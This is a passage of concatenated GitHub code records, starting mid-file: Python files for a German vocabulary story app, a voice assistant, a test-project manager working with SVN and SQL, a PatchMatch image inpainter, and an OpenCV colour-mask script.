random.sample(range(0, len(not_reviewed_words)), num_missing)\n else:\n random_word_indices = random.sample(range(0, len(not_reviewed_words)), len(not_reviewed_words))\n for random_index in random_word_indices:\n selected_words_lineNumber.append(not_reviewed_words[random_index])\n\n print(\"Number of selected words after adding random:\", len(selected_words_lineNumber))\n\n # Create a list of selected words\n selected_words = []\n for selected_word_lineNumber in selected_words_lineNumber:\n selected_words.append(selected_word_lineNumber[0])\n\n\n percentage_burned = number_burned / (len(wortLines) - 1)\n\n return wortLines, selected_words_lineNumber, selected_words, percentage_burned\n\n\ndef create_story(selected_words, temperature=0.0):\n # Prompt to create German Story\n # print(\"German Story temperature: \", temperature)\n messages = [\n {'role': 'system',\n 'content': \"\"\"\n You are a German teacher. \n \"\"\"\n },\n {'role': 'user',\n 'content': f\"\"\"\n Write a story in German with maximum 3 sentences.\n Only use words that are from the Goethe-Zertifikat A1 vocabulary list. \n Make sure these words are in the story: {\",\".join(selected_words)}\n \"\"\"\n },\n ]\n\n # Print story in German\n response = get_completion_from_messages(messages, temperature=temperature)\n print(\"German Story:\")\n print(response)\n input()\n\n messages.append(\n {'role': 'assistant',\n 'content': response\n }\n )\n\n return messages\n\n\n\ndef translate_to_English(messages):\n messages.append(\n {'role': 'user',\n 'content': 'Translate this German Story to English.'\n }\n )\n\n # Print story in English\n response = get_completion_from_messages(messages)\n print(\"English translation:\")\n print(response)\n input()\n\ndef anki(selected_words_lineNumber, wortLines):\n print(\"Anki:\")\n for wort_number, selected_word_lineNumber in enumerate(selected_words_lineNumber, start=1):\n wort = selected_word_lineNumber[0]\n lineNumber = selected_word_lineNumber[1]\n print(f\"{wort_number}. {wort}\")\n user_input = input(\"\")\n # Get the English translation using OpenAI\n messages = [\n {'role': 'system',\n 'content': \"\"\"\n You are a German teacher. \n \"\"\"\n },\n {'role': 'user',\n 'content': \"One Word English translation for: Klima\"\n },\n {'role': 'assistant',\n 'content': \"Climate\"\n },\n {'role': 'user',\n 'content': f\"One Word English translation for: {wort}\"\n },\n ]\n response = get_completion_from_messages(messages, temperature=0)\n user_input = input(response + \"\\n\")\n # Request for next Frequency\n currentFrequency = wortLines[lineNumber][1]\n freq_input = \"\"\n if currentFrequency == \"\":\n freq_input = input(\"Review again Tomorrow (T) or in 1 Week (W): \")\n elif currentFrequency == \"T\":\n freq_input = input(\"Review again Tomorrow (T) or in 1 Week (W): \")\n elif currentFrequency == \"W\":\n freq_input = input(\"Review again Tomorrow (T) or in 1 Month (M): \")\n elif currentFrequency == \"M\":\n freq_input = input(\"Review again Tomorrow (T) or in 3 Months (3M): \")\n elif currentFrequency == \"3M\":\n freq_input = input(\"Review again Tomorrow (T) or is it Burned in memory (B): \")\n elif currentFrequency == \"B\":\n freq_input = \"B\"\n print(\"This word is Burned in memory\\n\")\n\n # Based on next Frequency update the review date\n today = datetime.now().date()\n nextReviewDate = \"\"\n if freq_input == \"\":\n freq_input = \"T\"\n if freq_input == \"T\":\n nextReviewDate = today + timedelta(days=1)\n elif freq_input == \"W\":\n nextReviewDate = today + timedelta(days=7)\n elif freq_input == \"M\":\n nextReviewDate = today + timedelta(days=30)\n elif freq_input == \"3M\":\n nextReviewDate = today + timedelta(days=90)\n elif freq_input == \"B\":\n nextReviewDate = today\n\n # print(f\"{wort} line number: {lineNumber}\\n\")\n wortLines[lineNumber][1] = freq_input\n wortLines[lineNumber][2] = nextReviewDate.strftime(\"%Y-%m-%d\")\n\n print('\\n')\n\n\ndef save_to_csv(wortLines):\n # Write data to CSV file\n with open(file_path, 'w', newline='') as csv_file:\n csv_writer = csv.writer(csv_file)\n for row in wortLines:\n csv_writer.writerow(row)\n\n\n#recreate_wortlist()\nwortLines, selected_words_lineNumber, selected_words, percentage_burned = chooseSelectedWords()\nmessages = create_story(selected_words, temperature=percentage_burned)\nprint(f\"Percentage of words burned: {percentage_burned} \\n\")\nanki(selected_words_lineNumber, wortLines)\ntranslate_to_English(messages)\nsave_to_csv(wortLines)\n","repo_name":"raazgupta/GermanFriend","sub_path":"Story.py","file_name":"Story.py","file_ext":"py","file_size_in_byte":8355,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"10888955200","text":"from globals import *\nimport speech_recognition as sr\nimport datetime\nimport sys\nfrom sys import platform\nimport os\nimport subprocess\nfrom applemusic import AppleMusic\nimport randfacts\nimport pyautogui\nimport psutil\nfrom PyDictionary import PyDictionary\n\ndef speak(audio):\n \"\"\"\n Enables the virtual assistant to speak based on the required input.\n\n audio: text to be spoken\n \"\"\"\n print(\"Karen: {}\".format(audio))\n engine.say(audio)\n engine.runAndWait()\n\ndef GreetMe(name):\n \"\"\"\n This function ensures that the virtual assistant greets the user by \n their name.\n\n name: name of the user\n \"\"\"\n hour = int(datetime.datetime.now().hour)\n\n if hour >= 0 and hour < 12:\n speak(\"Good morning {}.\".format(name))\n time = 'this morning'\n elif hour >= 12 and hour < 18:\n speak(\"Good afternoon {}.\".format(name))\n time = 'today'\n else:\n speak(\"Good evening {}.\".format(name))\n time = 'tonight'\n \n speak(\"You can call me Karen. What would you like me to do for you {}?\".format(time))\n\ndef MyCommand():\n \"\"\"\n Listens to the voice of the user to determine the command that the virtual \n assistant must respond and the task it should accomplish.\n \"\"\"\n r = sr.Recognizer()\n with sr.Microphone() as source:\n print(\"Listening.\")\n r.pause_threshold = 1\n audio = r.listen(source) \n\n try:\n speak(\"Processing.\")\n query = r.recognize_google(audio, language='en-us')\n print(\"User: {}\\n\".format(query))\n\n except sr.UnknownValueError:\n speak(\"Could you say that again?\")\n return MyCommand()\n\n return query\n\ndef sendemail():\n \"\"\"\n Virtual assistant sends an email to a specified recipent.\n \"\"\"\n speak(\"Who should I send it to?\")\n recipient = MyCommand().lower()\n\n try:\n server = smtplib.SMTP('smtp.gmail.com', 587)\n server.ehlo()\n server.starttls()\n server.login('email', 'password')\n speak(\"What would you like me to say?\")\n content = MyCommand()\n server.sendmail('email', recipient, content)\n server.close()\n speak(\"Email sent.\")\n except:\n speak(\"Sorry, {}. I couldn't send your email.\".format(name))\n\ndef playsong():\n \"\"\"\n Virtual assistant plays a specified song from apple music.\n \"\"\"\n speak(\"What song would you like me to play?\")\n song = MyCommand()\n\n try:\n AM = AppleMusic()\n AM.setupMethod()\n AM.setupVariables()\n AM.initiateWindow()\n AM.login('email', 'password')\n AM.playSong(song)\n except:\n speak(\"Sorry, {}. I couldn't play the song you requested.\".format(name))\n\ndef screenshot():\n \"\"\"\n Virtual assistant takes a screenshot and then saves it.\n \"\"\"\n sc = pyautogui.screenshot()\n sc.save('my_screenshot.png')\n speak(\"Screenshot saved.\")\n\ndef google(command):\n \"\"\"\n Open a tab based on the specified google search term.\n\n command: command specified by the user\n \"\"\"\n term = command.replace('google', '').strip()\n url = \"https://www.google.com/search?q={}\".format(term)\n return url\n\ndef youtube(command):\n \"\"\"\n Open a tab based on the specified youtube search term.\n\n command: command specified by the user\n \"\"\"\n term = command.replace('youtube', '').strip()\n url = \"https://www.youtube.com/results?q={}\".format(term)\n return url\n\ndef reminder():\n \"\"\"\n Saves a reminder to a text file.\n \"\"\"\n speak(\"What would you like me to remind you?\")\n reminder = MyCommand()\n\n try:\n r = open('reminders.txt', 'w')\n r.write(reminder)\n r.close()\n speak(\"Reminder saved.\")\n except:\n speak(\"Sorry, {}. I couldn't set a reminder.\".format(name))\n\ndef secs2hours(secs):\n \"\"\"\n Converts time in seconds to hours, minutes, and seconds\n\n secs: time in seconds\n \"\"\"\n mm, ss = divmod(secs, 60)\n hh, mm = divmod(mm, 60)\n return \"{} hours, {} minutes, and {} seconds\".format(hh, mm, ss)\n\ndef dictionary():\n \"\"\"\n Gets the meaning of a word specific by the user.\n \"\"\"\n speak(\"What word would you like to know the meaning of?\")\n word = MyCommand().lower()\n\n try:\n dict = PyDictionary()\n meaning = dict.meaning(word) \n speak(meaning)\n except:\n speak(\"I couldn't quite get that, could you repeat the word?\")\n dictionary()\n\n# Code below this line is incomplete\n\ndef findphone():\n \"\"\"\n Find location of user's phone using iCloud\n \"\"\"\n return None\n\ndef weather():\n \"\"\"\n Provides information about the weather in a specified city.\n \"\"\"\n return None\n\ndef news():\n \"\"\"\n Provides the user with trending headlines.\n \"\"\"\n return None\n\ndef recaudio():\n \"\"\"\n Records audio until user manually stops the recording.\n \"\"\"\n return None\n\ndef recvideo():\n \"\"\"\n Records screen until user manually stops the recording.\n \"\"\"\n return None\n ","repo_name":"saifjamsheer/karen-virtual-assistant","sub_path":"helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":4965,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"72733908733","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\nimport os\nimport traceback\nfrom com.boyaa.RainbowCenter.common import constant\nfrom com.boyaa.RainbowCenter.common import utils\nfrom com.boyaa.RainbowCenter.common.cfg_helper import InitHelper\nfrom com.boyaa.RainbowCenter.common.excel_helper import ReadExcelHelper\nfrom com.boyaa.RainbowCenter.common.exception import error_constant\nfrom com.boyaa.RainbowCenter.common.exception.exception import RainbowCenterException\nfrom com.boyaa.RainbowCenter.manager.base import BaseManager\nfrom com.boyaa.RainbowCenter.manager.testcase_manager import TestCaseManager\n\nclass ProjectManager(BaseManager):\n\n __cfg_helper = InitHelper(constant.cfg_file_path)\n __testcast_manager = TestCaseManager()\n\n def __init__(self):\n BaseManager.__init__(self)\n self.cfg_helper = self.__cfg_helper\n self.testcase_manager = self.__testcast_manager\n\n def get_projects(self, condition=None):\n projects = []\n try:\n params = []\n sql = \"\"\"\n select pj.*, pd.name product_name, u.name creator\n from project pj\n left join product pd on pd.id = pj.product_id\n left join user u on u.id = pj.creator_id\n where 1 = 1 \"\"\"\n dics = {\n 'pd.id': (condition and 'product_id' in condition) and condition['product_id'] or None,\n 'pj.name': (condition and 'project_name' in condition and condition['project_name']) and '%' +\n condition[\n 'project_name'] + '%' or None,\n 'u.name': (condition and 'creator' in condition and condition['creator']) and '%' + condition[\n 'creator'] + '%' or None,\n 'cur_page': (condition and 'cur_page' in condition) and condition['cur_page'] or None\n }\n print(dics)\n sql, params = self.db.assemble_sql(sql, params, dics, 'and')\n result = self.db.query(sql, params)\n for project in result:\n project['create_date'] = str(project['create_date'])\n project['update_date'] = str(project['update_date'])\n projects.append(project)\n except Exception:\n exstr = traceback.format_exc()\n self.log.error(exstr)\n return projects\n\n def count_project(self, condition=None):\n row_count = 0\n try:\n params = []\n sql = \"\"\"\n select *\n from project pj\n left join product pd on pd.id = pj.product_id\n left join user u on u.id = pj.creator_id\n where 1 = 1\n \"\"\"\n dics = {\n 'pd.id': (condition and 'product_id' in condition) and condition['product_id'] or None,\n 'pj.name': (condition and 'project_name' in condition and condition['project_name']) and '%' +\n condition[\n 'project_name'] + '%' or None\n }\n sql, params = self.db.assemble_sql(sql, params, dics, 'and')\n row_count = self.db.row_count(sql, params)\n except Exception:\n exstr = traceback.format_exc()\n self.log.error(exstr)\n return row_count\n\n def add(self, infos):\n project_id = None\n try:\n project_name = infos['project_name']\n project_desc = infos['project_desc']\n product_id = utils.str_to_int(infos['product_id'])\n creator_id = infos['creator_id']\n svn_url = infos['svn_url']\n path = ''\n data_org = infos['data_org']\n sql = \"\"\"\n insert into project (`product_id`,`name`, `creator_id`, `path`, `data_org`, `svn_url`, `create_date`, `update_date`, `desc`)\n values (%s, %s, %s, %s, %s, %s, now(), now(), %s)\n \"\"\"\n params = [product_id, project_name, creator_id, path, data_org, svn_url, project_desc]\n project_id = self.db.execute(sql, params)\n except Exception:\n exstr = traceback.format_exc()\n self.log.error(exstr)\n error_code = error_constant.project_create_failed\n error_msg = error_constant.errors[error_code]\n raise RainbowCenterException(error_msg, error_code)\n return project_id\n\n def creat_project(self, infos):\n success = False\n # try:\n # project_id = self.add(infos)\n\n def get_projects_by_id(self, ids):\n result = []\n try:\n sql = 'select * from product where id in ('\n\n tmp = '%s,' * len(ids)\n sql += tmp[:-1]\n sql += ')'\n\n result = self.db.query(sql, ids)\n except Exception:\n exstr = traceback.format_exc()\n self.log.error(exstr)\n return result\n\n def check_project_name_exist(self, project_id, project_name):\n exist = False\n try:\n sql = \"select * from project where name = %s\"\n param = []\n param.append(project_name)\n if project_id:\n sql += ' and product_id = %s '\n param.append(project_id)\n count = self.db.row_count(sql, param)\n if count:\n exist = True\n except Exception:\n exstr = traceback.format_exc()\n self.log.error(exstr)\n return exist\n\n def create_project(self, infos):\n success = False\n try:\n project_id = self.add(infos)\n version_datas = []\n svn_url = infos['svn_url']\n path_list = utils.get_path_list_from_svn(svn_url)\n for path in path_list:\n version_data = [] # project_id, path, revision\n version_data.append(project_id)\n if path == 'trunk':\n version_data.append('trunk')\n path = svn_url + '/' + path\n revision = utils.get_revision_from_svn(path)\n version_data.append(revision)\n version_datas.append(version_data)\n elif path == 'branches':\n path = svn_url + '/' + path\n branch_path_list = utils.get_path_list_from_svn(path)\n for branch_path in branch_path_list:\n version_data.append('branches/' + branch_path)\n branch_path = path + '/' + branch_path\n revision = utils.get_revision_from_svn(path)\n version_data.append(revision)\n version_datas.append(version_data)\n sql = 'insert into project_svn_version (project_id, svn_path, version) values(%s, %s, %s)'\n self.db.execute_many(sql, version_datas)\n # create path\n path = os.sep.join([constant.test_project, str(infos['product_id']), str(project_id)])\n if os.path.exists(path):\n os.system('rd /S /Q %s' % path)\n os.makedirs(path, exist_ok=True)\n path = path.replace(os.sep, \"/\")\n sql = 'update project set path = %s where id = %s'\n self.db.execute(sql, [path, project_id])\n # checkout project from svn\n code_path = os.sep.join([path, 'code'])\n utils.checkout(infos['svn_url'], code_path)\n\n project = self.get_project(project_id)\n\n self.scan_ui_repository(project)\n # scan case\n if infos['scan_case']: # 0: not scan; 1: scan\n # scan cases\n project['scan_case'] = infos['scan_case']\n self.testcase_manager.scan_cases(project)\n success = True\n except RainbowCenterException as ex:\n raise ex\n except Exception:\n exstr = traceback.format_exc()\n self.log.error(exstr)\n error_code = error_constant.project_create_failed\n error_msg = error_constant.errors.get(error_code)\n raise RainbowCenterException(error_msg, error_code)\n return success\n\n def get_project(self, project_id):\n project = None\n try:\n sql = \"\"\"\n select pj.*, pd.name product_name, u.name creator\n from project pj\n left join product pd on pd.id = pj.product_id\n left join user u on u.id = pj.creator_id\n where pj.id = %s\n \"\"\"\n projects = self.db.query(sql, [project_id])\n if projects:\n project = projects[0]\n project['create_date'] = str(project['create_date'])\n project['update_date'] = str(project['update_date'])\n except Exception:\n exstr = traceback.format_exc()\n self.log.error(exstr)\n return project\n\n def __get_pages(self, project_id):\n sql = 'select * from `page` where project_id = %s'\n pages = self.db.query(sql, [project_id])\n return pages\n\n def scan_ui_repository(self, project):\n ui_repository_path = None\n try:\n # get project_id\n project_id = project['id']\n\n # delete ui_repository\n pages = self.__get_pages(project['id'])\n page_ids = []\n for page in pages:\n data = (page['id'],)\n page_ids.append(data)\n del_ui_sql = \"delete from ui_repository where page_id = %s \"\n self.db.execute_many(del_ui_sql, page_ids)\n\n del_page_sql = 'delete from page where project_id = %s '\n self.db.execute(del_page_sql, (project_id,))\n\n # get path\n share_folder = self.cfg_helper.get_value(\"share\", \"share_folder\", \"\")\n ui_repository_path = os.sep.join([share_folder, project['data_org'], 'UIRepository.xls'])\n\n # get datas\n if os.path.exists(ui_repository_path):\n excel_helper = ReadExcelHelper(ui_repository_path)\n\n sheet_name = 'UIElements'\n datas = excel_helper.get_row_datas(sheet_name)\n datas = datas[1:]\n ui_repository = {}\n page_name = None\n pages = []\n for data in datas:\n if data[0]:\n page_name = data[0]\n pages.append(page_name)\n ui_repository[page_name] = []\n ui_repository[page_name].append(\n {'name': data[1], 'find_method': data[2], 'value': data[3], 'index': data[4], 'desc': data[5]})\n\n # insert into db\n for page in pages:\n page_sql = 'insert into `page` (project_id, `name`, os_type) values (%s, %s ,%s) '\n params = (project_id, page, 1)\n page_id = utils.str_to_int(self.db.execute(page_sql, params))\n uis = ui_repository[page]\n ui_datas = []\n for ui in uis:\n ui_data = (page_id, ui['name'], ui['find_method'], str(ui['value']).replace(\"'\", \"\\'\"),\n utils.str_to_int(ui['index']), ui['desc'].replace(\"'\", \"\\'\"))\n ui_datas.append(ui_data)\n ui_sql = \"\"\"\n insert into ui_repository (`page_id`, `name`, `find_method`, `value`, `index`, `desc`)\n values (%s, %s, %s, %s, %s, %s)\n \"\"\"\n self.db.execute_many(ui_sql, ui_datas)\n else:\n error_code = error_constant.project_ui_repository_not_exist\n error_msg = error_constant.errors.get(error_code) % ui_repository_path\n raise RainbowCenterException(error_msg, error_code)\n except RainbowCenterException as ex:\n raise ex\n except Exception:\n exstr = traceback.format_exc()\n self.log.error(exstr)\n error_code = error_constant.project_scan_ui_repository_failed\n error_msg = error_constant.errors.get(error_code)\n raise RainbowCenterException(error_msg, error_code)\n\n def update(self, values):\n success = False\n try:\n project_id = values['project_id']\n project = self.get_projects(project_id)\n\n if not project:\n error_code = error_constant.project_not_exist\n error_msg = error_constant.errors.get(error_code)\n raise RainbowCenterException(error_msg, error_code)\n\n if 'svn_url' in values:\n svn_revision = utils.get_revision_from_svn(values['svn_url'])\n if svn_revision:\n values['svn_revision'] = svn_revision\n else:\n error_code = error_constant.project_svn_url_invalid\n error_msg = error_constant.errors.get(error_code)\n raise RainbowCenterException(error_msg, error_code)\n sql = '''update porject set update_date = now()'''\n params = []\n sql, params = self.db.assemble_sql(sql,params, values, \"\")\n sql += ' where id = %s '\n params.append(project_id)\n self.db.execute(sql,params)\n\n if 'svn_url' in values:\n code_path = os.sep.join([project['path'], 'code']).replace('/','\\\\')\n utils.checkout(values['svn_url', code_path])\n\n if 'scan_case' in values and values['scan_case']:\n self.testcase_manager.del_cases(project_id)\n project['scan_case'] = values['scan_case']\n self.testcase_manager.scan_cases(project)\n\n if 'scan_ui' in values and values['scan_ui']:\n self.scan_ui_repository(project)\n\n success = True\n\n except RainbowCenterException as ex:\n raise ex\n except Exception:\n exstr = traceback.format_exc()\n self.log.error(exstr)\n error_code = error_constant.project_update_failed\n error_msg = error_constant.errors.get(error_code)\n raise RainbowCenterException(error_msg, error_code)\n return success\n\n def update_svn_version(self, project_id):\n project = self.get_project(project_id)\n svn_url = project['svn_url']\n\n versions = self.get_versions({'project_id': project_id})\n path_list = []\n tmp_list = utils.get_path_list_from_svn(svn_url)\n\n for path in tmp_list:\n version_data = [] # project_id, path, revision\n version_data.append(project_id)\n if path == 'trunk':\n path_list.append(path)\n elif path == 'branches':\n path = svn_url + '/' + path\n branch_path_list = utils.get_path_list_from_svn(path)\n for branch_path in branch_path_list:\n path_list.append('branches/' + branch_path)\n\n update_datas = []\n del_datas = []\n for version in versions:\n svn_path = version['svn_path']\n version_id = version['id']\n if svn_path in path_list:\n revision = utils.get_revision_from_svn(svn_url + '/' + svn_path)\n update_datas.append([revision, version_id])\n path_list.remove(svn_path)\n else:\n del_datas.append(version_id)\n\n if update_datas:\n update_sql = 'update project_svn_version set `version` = %s where id = %s'\n self.db.execute_many(update_sql, update_datas)\n\n if del_datas:\n tmp = '%s,' * len(del_datas)\n del_sql = 'delete from project_svn_version where id in ('\n del_sql += tmp[:-1]\n del_sql += ')'\n self.db.execute(del_sql, del_datas)\n\n insert_datas = []\n if path_list:\n for path in path_list:\n revision = utils.get_revision_from_svn(svn_url + '/' + path)\n insert_datas.append([project_id, path, revision])\n insert_sql = 'insert into project_svn_version (project_id, svn_path, `version`) values (%s, %s, %s)'\n self.db.execute_many(insert_sql, insert_datas)\n\n def get_versions(self, condition=None):\n versions = []\n try:\n params = []\n sql = 'select * from project_svn_version where 1 = 1 '\n dics = {\n 'project_id' : (condition and 'project_id' in condition) and condition['project_id'] or None,\n 'id' : (condition and 'version_id' in condition) and condition['version_id'] or None\n }\n sql, params = self.db.assemble_sql(sql, params, dics, 'and')\n result = self.db.query(sql, params)\n for item in result:\n svn_path = item['svn_path']\n item['svn_version'] = svn_path\n if svn_path.find('branches') != -1:\n item['svn_version'] = svn_path.replace('branches/', '')\n versions.append(item)\n except Exception:\n exstr = traceback.format_exc()\n self.log.error(exstr)\n return versions\n\n def count_ui_repository(self, project_id):\n row_count = 0\n try:\n sql = \"\"\"\n select ur.*, p.name page_name\n from ui_repository ur\n left join page p on p.id = ur.page_id\n left join project pj on pj.id = p.project_id\n where pj.id = %s\n \"\"\"\n row_count = self.db.row_count(sql, [project_id])\n except Exception:\n exstr = traceback.format_exc()\n self.log.error(exstr)\n return row_count\n\n def get_ui_repository(self, condition=None):\n ui_repository = None\n try:\n params = []\n sql = \"\"\"\n select ur.*, p.name page_name\n from ui_repository ur\n left join page p on p.id = ur.page_id\n left join project pj on pj.id = p.project_id\n where 1 =1\n \"\"\"\n dics = {\n 'pj.id': (condition and 'project_id' in condition) and condition['project_id'] or None,\n 'cur_page': (condition and 'cur_page' in condition) and condition['cur_page'] or None\n }\n sql, params = self.db.assemble_sql(sql, params, dics, 'and', 'ur.id', 'asc')\n ui_repository = self.db.query(sql, params)\n except Exception:\n exstr = traceback.format_exc()\n self.log.error(exstr)\n return ui_repository\n","repo_name":"huangtao/tonardo_test","sub_path":"com/boyaa/RainbowCenter/manager/project_manager.py","file_name":"project_manager.py","file_ext":"py","file_size_in_byte":19049,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"69877837691","text":"import cv2\nimport numpy as np\n\nclass inpainter:\n\n def __init__(self, alpha):\n self.image = None\n self.padImage = None\n self.mask = None\n self.padMask = None\n self.offset = None\n self.alpha = alpha\n \n return\n\n def illegal(self, row : int, col : int) -> bool:\n if(row < 0 or col < 0):\n return True\n\n if(row >= self.image.shape[0] or col >= self.image.shape[1]):\n return True\n\n if(self.mask[row, col]): # in hole\n return True\n return False\n \n\n def initialize_offset(self):\n for i in range(self.mask.shape[0]): # for each row\n for j in range(self.mask.shape[1]): # for each column\n if(not self.mask[i, j]):\n self.offset[i, j] = [0, 0]\n else:\n while(1):\n rRow = np.random.randint(self.mask.shape[0], dtype = np.int32)\n rCol = np.random.randint(self.mask.shape[1], dtype = np.int32)\n if(not self.illegal(rRow, rCol)):\n self.offset[i, j] = [rRow - i, rCol - j]\n break\n self.offset.astype(np.int32)\n return\n\n def cropPatch(self, image, i : int, j : int, patchSize : int):\n halfSize = int(patchSize / 2)\n\n return image[int(i - halfSize) : int(i + halfSize + 1), int(j - halfSize): int(j + halfSize + 1), :]\n \n def patchDiff(self, patch1, patch2):\n if(patch1.shape != patch2.shape):\n return float(\"inf\")\n else:\n diff = (patch1.astype(np.float32) - patch2.astype(np.float32))\n \n return np.linalg.norm(diff)\n\n def smallestPatchDiff(self, diff1, diff2, diff3):\n if(diff1 <= diff2):\n if(diff1 <= diff3):\n return 1\n else:\n return 3\n else:\n if(diff2 <= diff3):\n return 2\n else:\n return 3\n\n def propagation(self, count : int, row : int, col : int, patchSize: int):\n padSize = patchSize // 2\n if(count % 2 == 0): \n\n holePatch = self.cropPatch(self.padImage, row+padSize, col+padSize, patchSize)\n\n refPos = (self.offset[row, col] + np.array([row, col])).astype(np.int32)\n refPatch = self.cropPatch(self.padImage, refPos[0]+padSize, refPos[1]+padSize, patchSize)\n\n lrefPos =(self.offset[row, col-1] + np.array([row, col-1])).astype(np.int32)\n lrefPos[1] += 1\n lrefPatch = self.cropPatch(self.padImage, lrefPos[0]+padSize, lrefPos[1]+padSize, patchSize)\n\n urefPos =(self.offset[row-1, col] + np.array([row-1, col])).astype(np.int32)\n urefPos [0] += 1\n urefPatch = self.cropPatch(self.padImage, urefPos[0]+padSize, urefPos[1]+padSize, patchSize)\n\n refDiff = self.patchDiff(holePatch, refPatch)\n lrefDiff = self.patchDiff(holePatch, lrefPatch)\n urefDiff = self.patchDiff(holePatch, urefPatch)\n if(self.illegal(lrefPos[0], lrefPos[1])):\n lrefDiff = float(\"inf\")\n if(self.illegal(urefPos[0], urefPos[1])):\n urefDiff = float(\"inf\")\n\n smallIdx = self.smallestPatchDiff(refDiff, lrefDiff, urefDiff)\n #print(f\" Small Idx : \", smallIdx)\n if(smallIdx == 2):\n self.offset[row, col] = self.offset[row, col-1]\n elif(smallIdx == 3):\n self.offset[row, col] = self.offset[row-1, col]\n \n else:\n \n holePatch = self.cropPatch(self.padImage, row+padSize, col+padSize, patchSize)\n\n refPos = (self.offset[row, col] + np.array([row, col])).astype(np.int32)\n refPatch = self.cropPatch(self.padImage, refPos[0]+padSize, refPos[1]+padSize, patchSize)\n\n rrefPos =(self.offset[row, col+1] + np.array([row, col+1])).astype(np.int32)\n rrefPos[1] -= 1\n rrefPatch = self.cropPatch(self.padImage, rrefPos[0]+padSize, rrefPos[1]+padSize, patchSize)\n\n brefPos = (self.offset[row+1, col] + np.array([row+1, col])).astype(np.int32)\n brefPos [0] -= 1\n brefPatch = self.cropPatch(self.padImage, brefPos[0]+padSize, brefPos[1]+padSize, patchSize)\n\n refDiff = self.patchDiff(holePatch, refPatch)\n rrefDiff = self.patchDiff(holePatch, rrefPatch)\n brefDiff = self.patchDiff(holePatch, brefPatch)\n if(self.illegal(rrefPos[0], rrefPos[1])):\n rrefDiff = float(\"inf\")\n if(self.illegal(brefPos[0], brefPos[1])):\n brefDiff = float(\"inf\")\n\n smallIdx = self.smallestPatchDiff(refDiff, rrefDiff, brefDiff)\n #print(f\" Small Idx : \", smallIdx)\n if(smallIdx == 2):\n self.offset[row, col] = self.offset[row, col+1]\n elif(smallIdx == 3):\n self.offset[row, col] = self.offset[row+1, col]\n return\n\n def randomSearch(self, row : int, col : int, patchSize: int):\n iterCount = 0.\n padSize = patchSize // 2\n w = max(self.image.shape)\n count = 0\n while(1):\n count+= 1\n if(count > 50):\n break\n\n randomRow = np.random.rand(1)\n randomCol = np.random.rand(1)\n \n fraction = w * np.power(self.alpha, iterCount)\n #if(count == 1):\n #print(self.offset[row, col], fraction)\n if(fraction < 1.):\n break\n\n\n newRowOffset = int(self.offset[row, col][0] + fraction * randomRow)\n newColOffset = int(self.offset[row, col][1] + fraction * randomCol)\n\n newRefRow = newRowOffset + row\n newRefCol = newColOffset + col\n\n if(self.illegal(newRefRow, newRefCol)):\n\n continue\n\n count = 0\n\n holePatch = self.cropPatch(self.padImage, row + padSize, col + padSize, patchSize)\n\n oriPatch = self.cropPatch(self.padImage, row + self.offset[row, col][0] + padSize, col + self.offset[row, col][1] + padSize, patchSize)\n newPatch = self.cropPatch(self.padImage, newRefRow + padSize, newRefCol + padSize, patchSize)\n\n oldDiff = self.patchDiff(holePatch, oriPatch)\n newDiff = self.patchDiff(holePatch, newPatch)\n\n if(oldDiff > newDiff):\n self.offset[row, col][0] = newRowOffset\n self.offset[row, col][1] = newColOffset\n iterCount += 1\n return\n\n def pastePatch(self, patchSize):\n padSize = int(patchSize / 2)\n halfSize = padSize\n for i in range(0, self.mask.shape[0]):\n for j in range(0, self.mask.shape[1]):\n \n if(self.mask[i, j] == 1):\n #print(f\"Paste {i}, {j}\")\n refRow = int(i + self.offset[i, j][0])\n refCol = int(j + self.offset[i, j][1])\n #print(f\" with {refRow}, {refCol}\")\n refPatch = self.cropPatch(self.padImage, refRow+padSize, refCol+padSize, patchSize)\n patchMask = self.padMask[i - halfSize: i + halfSize+1, j - halfSize : j + halfSize+1] \n patchMask = np.dstack((patchMask, patchMask, patchMask))\n diff = refPatch - self.padImage[i - halfSize: i + halfSize+1, j - halfSize : j + halfSize+1]\n\n self.padImage[i - halfSize: i + halfSize+1, j - halfSize : j + halfSize+1] += (diff * patchMask)\n self.image = self.padImage[halfSize: -halfSize, halfSize:-halfSize]\n\n return\n\n def inpaint(self, image, mask, patchSize):\n self.image = image\n # print(self.image.shape)\n self.mask = mask\n self.offset = np.zeros(self.mask.shape + tuple([2]))\n self.initialize_offset()\n \n padSize = int(patchSize / 2)\n self.padMask = np.pad(self.mask, ((padSize, padSize), (padSize, padSize)), 'symmetric')\n self.padImage = np.pad(self.image, ((padSize, padSize), (padSize, padSize), (0, 0)), 'symmetric') #pad for dealing with margin\n \n for t in range(40):\n\n print(f\"Iteration {t} : \")\n \n if(t % 2 == 0):\n for i in range(self.mask.shape[0]): # for each row\n for j in range(self.mask.shape[1]): # for each column\n if(self.mask[i, j]):\n #print(f\" Prop {i}, {j}\")\n self.propagation(t, i, j, patchSize)\n #print(f\" Search {i}, {j}\")\n self.randomSearch(i, j, patchSize)\n else:\n for i in range(self.mask.shape[0])[::-1]: # for each row\n for j in range(self.mask.shape[1])[::-1]: # for each column\n if(self.mask[i, j]):\n self.propagation(t, i, j, patchSize)\n self.randomSearch(i, j, patchSize)\n self.pastePatch(patchSize)\n # cv2.imshow(\"Paste\", self.image)\n # cv2.waitKey(1000)\n\n return self.image\n\n\n ","repo_name":"jnfem112/VFX2022SPRING","sub_path":"project/code/inpainter.py","file_name":"inpainter.py","file_ext":"py","file_size_in_byte":9272,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"71870031932","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Nov 20 15:57:02 2021\n\n@author: timka\n\"\"\"\n\nimport cv2 as cv\n\nimport numpy as np\n\nfn = 'p1.png'\nimg = cv.imread(fn)\nhsv = cv.cvtColor(img, cv.COLOR_BGR2HSV)\n\nlower = np.array((70, 70, 70), np.uint8)\n\nupper = np.array((150,255,255), np.uint8)\n\nmask = cv.inRange(hsv, lower, upper)\nresult = cv.bitwise_and(img, img, mask = mask)\n\ncv.imshow('frame', img)\ncv.imshow('mask', mask)\ncv.imshow('result', result)\ncv.waitKey(0)\ncv.destroyAllWindows() 